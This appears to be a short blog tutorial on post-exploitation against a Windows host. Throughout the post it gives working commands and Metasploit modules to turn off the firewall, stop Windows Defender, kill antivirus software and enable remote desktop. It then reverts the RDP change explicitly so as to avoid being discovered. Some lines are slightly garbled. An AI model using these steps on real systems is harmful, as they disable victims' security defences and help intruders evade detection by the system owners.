Article foreword
I haven’t updated the blog for a long time. I’m sorry everyone. This time I update an article on "Host Defense Service Start and Stop", I hope it’s useful~
Turn off the firewall
Initial state: firewall is on
Execute the following command to turn off the firewall:
netsh advfirewall set allprofiles state off //Administrator and above permissions (rights can be increased)
Close Denfend
Initial state: enabled state
Then execute the following command to close:
net stop windefend
Turn off antivirus software
run killav
run post / windows / manage / killava
Open remote desktop
Initial state: the remote desktop is closed
run post/windows/manage/enable_rdp
Check again that the status has been successfully modified to run a remote connection:
After that, we can use the file generated when the remote desktop is opened above to close the remote desktop connection to avoid being discovered:
run multi_console_command -r /root/.msf4/loot/20200918170851_default_192.168.188.3_host.windows.cle_935765.txt
Check it again and it becomes